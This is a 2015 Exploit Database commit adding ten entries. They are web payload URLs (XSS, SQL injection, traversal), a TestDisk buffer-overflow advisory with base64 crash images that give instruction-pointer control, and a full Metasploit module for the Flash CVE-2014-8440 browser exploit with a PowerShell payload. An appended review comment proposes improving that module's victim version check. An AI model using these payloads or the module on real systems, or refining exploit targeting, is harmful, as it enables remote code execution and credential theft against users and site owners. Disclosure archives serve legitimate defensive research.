From 3ca5bb5bfcab84ccd290b18c9f085fd215d8d171 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 2 May 2015 05:02:10 +0000
Subject: [PATCH] DB: 2015-05-02 10 new exploits
---
 files.csv | 10 ++
 platforms/hardware/remote/36877.html | 16 +++
 platforms/multiple/dos/36881.txt | 141 +++++++++++++++++++++++++++
 platforms/php/webapps/36873.txt | 9 ++
 platforms/php/webapps/36874.txt | 15 +++
 platforms/php/webapps/36875.txt | 13 +++
 platforms/php/webapps/36876.txt | 9 ++
 platforms/php/webapps/36878.txt | 9 ++
 platforms/php/webapps/36882.txt | 9 ++
 platforms/php/webapps/36883.txt | 13 +++
 platforms/windows/remote/36880.rb | 108 ++++++++++++++++++++
 11 files changed, 352 insertions(+)
 create mode 100755 platforms/hardware/remote/36877.html
 create mode 100755 platforms/multiple/dos/36881.txt
 create mode 100755 platforms/php/webapps/36873.txt
 create mode 100755 platforms/php/webapps/36874.txt
 create mode 100755 platforms/php/webapps/36875.txt
 create mode 100755 platforms/php/webapps/36876.txt
 create mode 100755 platforms/php/webapps/36878.txt
 create mode 100755 platforms/php/webapps/36882.txt
 create mode 100755 platforms/php/webapps/36883.txt
 create mode 100755 platforms/windows/remote/36880.rb
diff --git a/files.csv b/files.csv
index 60f2fbc7d..c3fc2f666 100755
--- a/files.csv
+++ b/files.csv
@@ -33265,3 +33265,13 @@ id,file,description,date,author,platform,type,port
 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router Multiple HTTP Header Fields Denial Of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0
 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 'SELECT' Statement 'WHERE' Condition Denial of Service Vulnerability",2012-02-09,IBM,multiple,dos,0
 36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 'login.php' Cross Site Scripting Vulnerability",2012-02-22,"Stefan Schurtz",php,webapps,0
+36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0
+36874,platforms/php/webapps/36874.txt,"Chyrp 2.1.1 'ajax.php' HTML Injection Vulnerability",2012-02-22,"High-Tech Bridge SA",php,webapps,0
+36875,platforms/php/webapps/36875.txt,"Chyrp 2.1.2 includes/error.php body Parameter XSS",2012-02-22,"High-Tech Bridge SA",php,webapps,0
+36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 'plugin' Parameter Cross Site Scripting Vulnerability",2012-02-22,Ariko-Security,php,webapps,0
+36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery Vulnerability",2012-02-23,"Rigan Iimrigan",hardware,remote,0
+36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 'dl.php' HTTP Response Splitting Vulnerability",2012-02-23,"Corrado Liotta",php,webapps,0
+36880,platforms/windows/remote/36880.rb,"Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory",2015-05-01,metasploit,windows,remote,0
+36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0
+36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 'eid' Parameter SQL Injection Vulnerability",2012-02-26,"Red Security TEAM",php,webapps,0
+36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x Multiple Cross Site Scripting 
Vulnerabilities",2012-02-26,MustLive,php,webapps,0
diff --git a/platforms/hardware/remote/36877.html b/platforms/hardware/remote/36877.html
new file mode 100755
index 000000000..9984c6702
--- /dev/null
+++ b/platforms/hardware/remote/36877.html
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/52134/info
+
+The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability.
+
+Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.
+
+This issue affects D-Link DCS-900, DCS-2000, and DCS-5300.
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/multiple/dos/36881.txt b/platforms/multiple/dos/36881.txt
new file mode 100755
index 000000000..1a19d155a
--- /dev/null
+++ b/platforms/multiple/dos/36881.txt
@@ -0,0 +1,141 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +TestDisk 6.14 Check_OS2MB Stack Buffer Overflow +Affected versions: TestDisk 6.14 - Linux, Windows and Mac OSX + +PDF: +http://www.security-assessment.com/files/documents/advisory/Testdisk%20Check_OS2MB%20Stack%20Buffer%20Overflow%20-%20Release.pdf + ++-----------+ +|Description| ++-----------+ +This document details a stack based buffer overflow vulnerability within TestDisk 6.14. A buffer overflow is triggered +within the software when a malicious disk image is attempted to be recovered. This may be leveraged by an +attacker to crash TestDisk and gain control of program execution. An attacker would have to coerce the victim to run +TestDisk against their malicious image. + ++------------+ +|Exploitation| ++------------+ +The check_OS2MB method (fat.c, line 862) is vulnerable to a stack based buffer overflow. This is due to the 512 +byte buffer 'buffer' (defined in fat.c, check_OS2MB method, line 864) being overflowed by a subsequent memcpy +call in the cache_pread_aux method (hdcache.c, line 109). The third argument to the memcpy call (defining the +amount of data to be copied) is controlled by the attacker, this is set in a header in the test case (offset 0xC in the +below testcase, set to 2048, or 0x0800). 
+ +The following GDB output shows the vulnerable memcpy call and the attacker controlled size argument (0x00000800): + +Breakpoint 1, 0x0804e5c2 in cache_pread_aux (disk_car=0x80c13b0, buffer=0xbffff0f0, count=2048, offset=0, read_ahead=0) at hdcache.c:109 +109 memcpy(buffer, cache->buffer + offset - cache->cache_offset, count); +(gdb) x/i $eip +=> 0x804e5c2 : call 0x80499f0 +(gdb) x/3x $esp +0xbffff010: 0xbffff0f0 0x080c3000 0x00000800 + +The following base64 data contains the test case which results in EIP control, in this case EIP being set to +BEE5BEE5. The value EIP is overwritten with is at 0x20c + +6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU +ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg +ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5 +IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW +1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA +AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA +AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA +AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA +AAAAAAAAKY9iYu3lvuW+NAsGCA0K + +--[ Linux +Note that in the provided test case, 4 bytes at 0x210 have been set to a valid address within the TEXT segment of +the TestDisk ELF file. This is due to GCC 4.7.2 compiling the Check_OS2MB method with the following assembly +code: + + 0x08060a8d <+71>: call *%ecx + 0x08060a8f <+73>: mov %eax,%edx + 0x08060a91 <+75>: mov 0x8(%ebp),%eax + 0x08060a94 <+78>: mov 0x194(%eax),%eax + 0x08060a9a <+84>: cmp %eax,%edx + 0x08060a9c <+86>: je 0x8060ac5 + +The instruction 'mov 0x8(%ebp), %eax' (0x08060a91) moves an attacker controlled portion of memory into the EAX +register and subsequently tries to read from that address ('mov 0x194(%eax)'). 
Thus, this has to be set to a +legitimate address, otherwise TestDisk performs an out-of-bounds memory read before returning from the +check_OS2MB method. + +As long as EDX and EAX do not match, the check_OS2MB method calls screen_buffer_add and log_redirect, then +jumps to the end of the check_OS2MB method, successfully exploiting stack overflow and gaining EIP control. +The precompiled version of TestDisk has been compiled with a stack protector. In order to exploit the precompiled +version, an attacker would have to find a way to bypass GCC’s '-fstack-protector' functionality + +--[ Windows +The provided test case results in EIP being overwritten with 0xBEE5BEE5 in the precompiled version of TestDisk. +This was tested on Windows 7 and 8.1. + +--[ Mac OSX +An attacker can also gain EIP control on the Mac OSX version of TestDisk 6.14, however the original test case +needs to be padded. The value EIP is overwritten with is at 0x21C in the OSX test case. The base64 of the OSX crash +test case is below. As in the above examples, EIP is overwritten with 0xBEE5BEE5. + +6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU +ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg +ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5 +IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW +1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA +AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA +AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA +AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA +AAAAAAAAKY9iYu0AAAAAAAAAAAAAAAAAAAAA5b7lvg== + ++----------+ +| Solution | ++----------+ +Upgrade to TestDisk 7.0 or newer. 
+ ++-------------------+ +|Disclosure Timeline| ++-------------------+ +9/04/2015 – Advisory sent to Christophe Grenier. +9/04/2015 – Response from Christophe Grenier advising that a fix is ready for the +development version. Christophe advised a new stable version will be available in 2 weeks. +18/04/2015 – TestDisk 7.0 Released. +30/04/2015 – Release of this document. + ++-----------------------------+ +|About Security-Assessment.com| ++-----------------------------+ + +Security-Assessment.com is Australasia's leading team of Information +Security consultants specialising in providing high quality Information +Security services to clients throughout the Asia Pacific region. Our +clients include some of the largest globally recognised companies in +areas such as finance, telecommunications, broadcasting, legal and +government. Our aim is to provide the very best independent advice and +a high level of technical expertise while creating long and lasting +professional relationships with our clients. Security-Assessment.com +is committed to security research and development, and its team continues +to identify and responsibly publish vulnerabilities in public and +private software vendor's products. Members of the +Security-Assessment.com R&D team are globally recognised through their +release of whitepapers and presentations related to new security research. + +For further information on this issue or any of our service offerings, +contact us: + +Web www.security-assessment.com +Email info () security-assessment com +Phone +64 4 470 1650 \ No newline at end of file diff --git a/platforms/php/webapps/36873.txt b/platforms/php/webapps/36873.txt new file mode 100755 index 000000000..c19bb8454 --- /dev/null +++ b/platforms/php/webapps/36873.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52113/info
+
+Dolibarr is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected.
+
+http://www.example.com/document.php?modulepart=project&file=../[FILE INCLUDE VULNERABILITY!]
\ No newline at end of file
diff --git a/platforms/php/webapps/36874.txt b/platforms/php/webapps/36874.txt
new file mode 100755
index 000000000..ef8c9c4b0
--- /dev/null
+++ b/platforms/php/webapps/36874.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/52115/info
+
+Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+Chyrp 2.1.1 is vulnerable; other versions may also be affected.
+
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/36875.txt b/platforms/php/webapps/36875.txt
new file mode 100755
index 000000000..c58b32e60
--- /dev/null
+++ b/platforms/php/webapps/36875.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/52117/info
+
+Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+Chyrp 2.1.2 is vulnerable; other versions may also be affected.
+
+
+
+
+
+
diff --git a/platforms/php/webapps/36876.txt b/platforms/php/webapps/36876.txt
new file mode 100755
index 000000000..c06dc56ee
--- /dev/null
+++ b/platforms/php/webapps/36876.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52125/info
+
+Oxwall is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Oxwall 1.1.1 and prior versions are vulnerable; other versions may also be affected.
+
+http://www.example.com/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/36878.txt b/platforms/php/webapps/36878.txt
new file mode 100755
index 000000000..91664dcee
--- /dev/null
+++ b/platforms/php/webapps/36878.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52136/info
+
+Mobile Mp3 Search Script is prone to an HTTP-response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
+
+Mobile Mp3 Search Script 2.0 is vulnerable; other versions may also be affected
+
+http://www.example.com/dl.php?url=http://www.google.it
\ No newline at end of file
diff --git a/platforms/php/webapps/36882.txt b/platforms/php/webapps/36882.txt
new file mode 100755
index 000000000..6966b08d0
--- /dev/null
+++ b/platforms/php/webapps/36882.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52168/info
+
+MyJobList is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MyJobList 0.1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/?loc=profile&eid=[SQLi]
\ No newline at end of file
diff --git a/platforms/php/webapps/36883.txt b/platforms/php/webapps/36883.txt
new file mode 100755
index 000000000..85b2b5c2e
--- /dev/null
+++ b/platforms/php/webapps/36883.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/52170/info
+
+Webglimpse is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
+
+Webglimpse versions 2.18.8 and prior are affected.
+
+http://www.example.com/wgarcmin.cgi?URL2FIL=URL+2+File+--%3E&URL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
+
+http://www.example.com/wgarcmin.cgi?FIL2URL=%3C--+File+2+URL&FILE=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
+
+http://www.example.com/wgarcmin.cgi?DOMAIN=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
\ No newline at end of file
diff --git a/platforms/windows/remote/36880.rb b/platforms/windows/remote/36880.rb
new file mode 100755
index 000000000..cbbb8e621
--- /dev/null
+++ b/platforms/windows/remote/36880.rb
@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory',
+ 'Description' => %q{
+ This module exploits an unintialized memory vulnerability in Adobe Flash Player. The
+ vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails
+ to initialize allocated memory. When using a correct memory layout this vulnerability
+ leads to a ByteArray object corruption, which can be abused to access and corrupt memory.
+ This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with
+ Flash 15.0.0.189.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Nicolas Joly', # Vulnerability discovery
+ 'Unknown', # Exploit in the wild
+ 'juan vazquez' # msf module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-8440'],
+ ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-24.html'],
+ ['URL', 'http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html'],
+ ['URL', 'http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'BrowserRequirements' =>
+ {
+ :source => /script|headers/i,
+ :os_name => OperatingSystems::Match::WINDOWS_7,
+ :ua_name => Msf::HttpClients::IE,
+ :flash => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' },
+ :arch => ARCH_X86
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic', {} ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Nov 11 2014',
+ 'DefaultTarget' => 0))
+ end
+
+ def exploit
+ @swf = create_swf
+ super
+ end
+
+ def on_request_exploit(cli, 
request, target_info)
+ print_status("Request: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status('Sending SWF...')
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+ return
+ end
+
+ print_status('Sending HTML...')
+ send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+ end
+
+ def exploit_template(cli, target_info)
+ swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+ target_payload = get_payload(cli, target_info)
+ psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
+ b64_payload = Rex::Text.encode_base64(psh_payload)
+
+ html_template = %Q|
+
+
+
+
+
+
+
+
+
+
+ |
+
+ return html_template, binding()
+ end
+
+ def create_swf
+ path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-8440', 'msf.swf')
+ swf = ::File.open(path, 'rb') { |f| swf = f.read }
+
+ swf
+ end
+
+end
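Review bot: The Flash gate in 'BrowserRequirements', `:flash => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' }`, compares dotted version strings with String#<=, which is lexicographic: '15.0.0.2' sorts after '15.0.0.189' and would be rejected as too new, so the check only gives the right answer for the 15.x builds that happened to ship, not by construction. Assuming `ver` is the plain dotted numeric string the existing comparison already expects, `:flash => lambda { |ver| ver =~ /^15\./ && Gem::Version.new(ver) <= Gem::Version.new('15.0.0.189') }` compares component-wise and needs nothing beyond rubygems, which Metasploit already loads. A smaller point in create_swf: `swf = ::File.open(path, 'rb') { |f| swf = f.read }` assigns `swf` inside the block and then again from the block's return value, and `swf = ::File.binread(path)` expresses the same read without the duplicate assignment. The `%Q|` template body in exploit_template is blank in this rendering, so its contents could not be reviewed here.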